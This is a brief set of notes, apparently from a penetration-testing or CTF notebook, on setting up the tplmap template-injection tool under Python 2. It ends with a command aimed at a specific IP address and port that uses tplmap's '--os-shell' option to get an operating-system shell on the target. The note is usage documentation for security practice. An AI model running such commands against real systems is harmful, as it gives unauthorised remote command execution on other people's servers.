tplmap dependencies

works on python2

git clone https://github.com/epinna/tplmap

In case if tplmap has the error no module yaml, follow these steps:

curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py

python2 get-pip.py

In tplmap directory, python2 -m pip install -r requirements.txt

python2 tplmap.py -u target

python2 tplmap.py -u 'http://209.97.136.59:30095/' -d name=john --os-shell

Last updated